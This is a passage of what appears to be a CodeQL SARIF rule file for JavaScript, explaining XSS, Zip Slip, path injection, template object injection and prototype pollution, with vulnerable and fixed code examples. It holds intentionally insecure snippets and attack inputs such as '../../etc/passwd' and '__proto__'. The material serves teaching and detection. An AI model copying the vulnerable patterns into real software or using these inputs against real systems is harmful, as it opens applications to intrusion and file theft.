res.send(\"Unknown user: \" + escape(req.params.id));\n else\n // TODO: do something exciting\n ;\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to an HTTP response allows for\n a cross-site scripting vulnerability.", - "id" : "js/reflected-xss", - "kind" : "path-problem", - "name" : "Reflected cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/html-constructed-from-input", - "name" : "js/html-constructed-from-input", - "shortDescription" : { - "text" : "Unsafe HTML constructed from library input" - }, - "fullDescription" : { - "text" : "Using externally controlled strings to construct HTML might allow a malicious user to perform a cross-site scripting attack." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Unsafe HTML constructed from library input\nWhen a library function dynamically constructs HTML in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may inadvertently use inputs containing unsafe HTML fragments, and thereby leave the client vulnerable to cross-site scripting attacks.\n\n\n## Recommendation\nDocument all library functions that can lead to cross-site scripting attacks, and guard against unsafe inputs where dynamic HTML construction is not intended.\n\n\n## Example\nThe following example has a library function that renders a boldface name by writing to the `innerHTML` property of an element.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + name + \"\";\n}\n\n```\nThis library function, however, does not escape unsafe HTML, and a client that calls the function with user-supplied input may be vulnerable to cross-site scripting attacks.\n\nThe library could either document that this function should not be used with unsafe inputs, or use safe APIs such as `innerText`.\n\n\n```javascript\nmodule.exports = function showBoldName(name) {\n const bold = document.createElement('b');\n bold.innerText = name;\n document.getElementById('name').appendChild(bold);\n}\n\n```\nAlternatively, an HTML sanitizer can be used to remove unsafe content.\n\n\n```javascript\n\nconst striptags = require('striptags');\nmodule.exports = function showBoldName(name) {\n document.getElementById('name').innerHTML = \"\" + striptags(name) + \"\";\n}\n\n```\n\n## References\n* OWASP: [DOM based XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet).\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).\n* OWASP [DOM Based XSS](https://www.owasp.org/index.php/DOM_Based_XSS).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using externally controlled strings to construct HTML might allow a malicious\n user to perform a cross-site scripting attack.", - "id" : "js/html-constructed-from-input", - "kind" : "path-problem", - "name" : "Unsafe HTML constructed from library input", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/stored-xss", - "name" : "js/stored-xss", - "shortDescription" : { - "text" : "Stored cross-site scripting" - }, - "fullDescription" : { - "text" : "Using uncontrolled stored values in HTML allows for a stored cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Stored cross-site scripting\nDirectly using uncontrolled stored value (for example, file names) to create HTML content without properly sanitizing the input first, allows for a cross-site scripting vulnerability.\n\nThis kind of vulnerability is also called *stored* cross-site scripting, to distinguish it from other types of cross-site scripting.\n\n\n## Recommendation\nTo guard against cross-site scripting, consider using contextual output encoding/escaping before using uncontrolled stored values to create HTML content, or one of the other solutions that are mentioned in the references.\n\n\n## Example\nThe following example code writes file names directly to a HTTP response. This leaves the website vulnerable to cross-site scripting, if an attacker can choose the file names on the disk.\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // BAD: `fileName` can contain HTML elements\n list += '
  • ' + fileName + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\nSanitizing the file names prevents the vulnerability:\n\n\n```javascript\nvar express = require('express'),\n fs = require('fs'),\n escape = require('escape-html');\n\nexpress().get('/list-directory', function(req, res) {\n fs.readdir('/public', function (error, fileNames) {\n var list = '
    ';\n fileNames.forEach(fileName => {\n // GOOD: escaped `fileName` can not contain HTML elements\n list += '
  • ' + escape(fileName) + '
    • ';\n });\n list += '
'\n res.send(list);\n });\n});\n\n```\n\n## References\n* OWASP: [XSS (Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html).\n* OWASP [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).\n* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Using uncontrolled stored values in HTML allows for\n a stored cross-site scripting vulnerability.", - "id" : "js/stored-xss", - "kind" : "path-problem", - "name" : "Stored cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/zipslip", - "name" : "js/zipslip", - "shortDescription" : { - "text" : "Arbitrary file access during archive extraction (\"Zip Slip\")" - }, - "fullDescription" : { - "text" : "Extracting files from a malicious ZIP file, or similar type of archive, without validating that the destination file path is within the destination directory can allow an attacker to unexpectedly gain access to resources." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n", - "markdown" : "# Arbitrary file access during archive extraction (\"Zip Slip\")\nExtracting files from a malicious zip file, or similar type of archive, is at risk of directory traversal attacks if filenames from the archive are not properly validated. archive paths.\n\nZip archives contain archive entries representing each file in the archive. These entries include a file path for the entry, but these file paths are not restricted and may contain unexpected special elements such as the directory traversal element (`..`). If these file paths are used to create a filesystem path, then a file operation may happen in an unexpected location. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\nFor example, if a zip file contains a file entry `..\\sneaky-file`, and the zip file is extracted to the directory `c:\\output`, then naively combining the paths would result in an output file path of `c:\\output\\..\\sneaky-file`, which would cause the file to be written to `c:\\sneaky-file`.\n\n\n## Recommendation\nEnsure that output paths constructed from zip archive entries are validated to prevent writing files to unexpected locations.\n\nThe recommended way of writing an output file from a zip archive entry is to check that `\"..\"` does not occur in the path.\n\n\n## Example\nIn this example an archive is extracted without validating file paths. If `archive.zip` contained relative paths (for instance, if it were created by something like `zip archive.zip ../file.txt`) then executing this code could write to locations outside the destination directory.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // BAD: This could write any file on the filesystem.\n entry.pipe(fs.createWriteStream(fileName));\n });\n\n```\nTo fix this vulnerability, we need to check that the path does not contain any `\"..\"` elements in it.\n\n\n```javascript\nconst fs = require('fs');\nconst unzip = require('unzip');\n\nfs.createReadStream('archive.zip')\n .pipe(unzip.Parse())\n .on('entry', entry => {\n const fileName = entry.path;\n // GOOD: ensures the path is safe to write to.\n if (fileName.indexOf('..') == -1) {\n entry.pipe(fs.createWriteStream(fileName));\n }\n else {\n console.log('skipping bad path', fileName);\n }\n });\n\n```\n\n## References\n* Snyk: [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability).\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022" ], - "description" : "Extracting files from a malicious ZIP file, or similar type of archive, without\n validating that the destination file path is within the destination directory\n can allow an attacker to unexpectedly gain access to resources.", - "id" : "js/zipslip", - "kind" : "path-problem", - "name" : "Arbitrary file access during archive extraction (\"Zip Slip\")", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/path-injection", - "name" : "js/path-injection", - "shortDescription" : { - "text" : "Uncontrolled data used in path expression" - }, - "fullDescription" : { - "text" : "Accessing paths influenced by users can allow an attacker to access unexpected resources." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n", - "markdown" : "# Uncontrolled data used in path expression\nAccessing files using paths constructed from user-controlled data can allow an attacker to access unexpected resources. This can result in sensitive information being revealed or deleted, or an attacker being able to influence behavior by modifying unexpected files.\n\n\n## Recommendation\nValidate user input before using it to construct a file path, either using an off-the-shelf library like the `sanitize-filename` npm package, or by performing custom validation.\n\nIdeally, follow these rules:\n\n* Do not allow more than a single \".\" character.\n* Do not allow directory separators such as \"/\" or \"\\\\\" (depending on the file system).\n* Do not rely on simply replacing problematic sequences such as \"../\". For example, after applying this filter to \".../...//\", the resulting string would still be \"../\".\n* Use a whitelist of known good patterns.\n\n## Example\nIn the first example, a file name is read from an HTTP request and then used to access a file. However, a malicious user could enter a file name which is an absolute path, such as `\"/etc/passwd\"`.\n\nIn the second example, it appears that the user is restricted to opening a file within the `\"user\"` home directory. However, a malicious user could enter a file name containing special characters. For example, the string `\"../../etc/passwd\"` will result in the code reading the file located at `\"/home/user/../../etc/passwd\"`, which is the system's password file. This file would then be sent back to the user, giving them access to all the system's passwords.\n\n\n```javascript\nvar fs = require('fs'),\n http = require('http'),\n url = require('url');\n\nvar server = http.createServer(function(req, res) {\n let path = url.parse(req.url, true).query.path;\n\n // BAD: This could read any file on the file system\n res.write(fs.readFileSync(path));\n\n // BAD: This could still read any file on the file system\n res.write(fs.readFileSync(\"/home/user/\" + path));\n});\n\n```\n\n## References\n* OWASP: [Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal).\n* npm: [sanitize-filename](https://www.npmjs.com/package/sanitize-filename) package.\n* Common Weakness Enumeration: [CWE-22](https://cwe.mitre.org/data/definitions/22.html).\n* Common Weakness Enumeration: [CWE-23](https://cwe.mitre.org/data/definitions/23.html).\n* Common Weakness Enumeration: [CWE-36](https://cwe.mitre.org/data/definitions/36.html).\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-99](https://cwe.mitre.org/data/definitions/99.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-023", "external/cwe/cwe-036", "external/cwe/cwe-073", "external/cwe/cwe-099" ], - "description" : "Accessing paths influenced by users can allow an attacker to access\n unexpected resources.", - "id" : "js/path-injection", - "kind" : "path-problem", - "name" : "Uncontrolled data used in path expression", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/template-object-injection", - "name" : "js/template-object-injection", - "shortDescription" : { - "text" : "Template Object Injection" - }, - "fullDescription" : { - "text" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Template Object Injection\nDirectly using user-controlled objects as arguments to template engines might allow an attacker to do local file reads or even remote code execution.\n\n\n## Recommendation\nAvoid using user-controlled objects as arguments to a template engine. Instead, construct the object explicitly with the specific properties needed by the template.\n\n\n## Example\nIn the example below a server uses the user-controlled `profile` object to render the `index` template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', profile);\n});\n```\nHowever, if an attacker adds a `layout` property to the `profile` object then the server will load the file specified by the `layout` property, thereby allowing an attacker to do local file reads.\n\nThe fix is to have the server construct the object, and only add the properties that are needed by the template.\n\n\n```javascript\nvar app = require('express')();\napp.set('view engine', 'hbs');\n\napp.post('/', function (req, res, next) {\n var profile = req.body.profile;\n res.render('index', {\n name: profile.name,\n location: profile.location\n });\n});\n```\n\n## References\n* blog.shoebpatel.com: [The Secret Parameter, LFR, and Potential RCE in NodeJS Apps](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/).\n* cwe.mitre.org: [CWE-73: External Control of File Name or Path](https://cwe.mitre.org/data/definitions/73.html)\n* Common Weakness Enumeration: [CWE-73](https://cwe.mitre.org/data/definitions/73.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-073", "external/cwe/cwe-094" ], - "description" : "Instantiating a template using a user-controlled object is vulnerable to local file read and potential remote code execution.", - "id" : "js/template-object-injection", - "kind" : "path-problem", - "name" : "Template Object Injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/prototype-polluting-assignment", - "name" : "js/prototype-polluting-assignment", - "shortDescription" : { - "text" : "Prototype-polluting assignment" - }, - "fullDescription" : { - "text" : "Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n", - "markdown" : "# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n let items = req.session.todos.get(id);\n if (!items) {\n items = new Map();\n req.sessions.todos.set(id, items);\n }\n items.set(req.query.name, req.query.text);\n res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n let id = req.params.id;\n if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n res.end(403);\n return;\n }\n let items = req.session.todos[id];\n if (!items) {\n items = req.session.todos[id] = {};\n }\n items[req.query.name] = req.query.text;\n res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-078", "external/cwe/cwe-079", "external/cwe/cwe-094", "external/cwe/cwe-400", "external/cwe/cwe-471", "external/cwe/cwe-915" 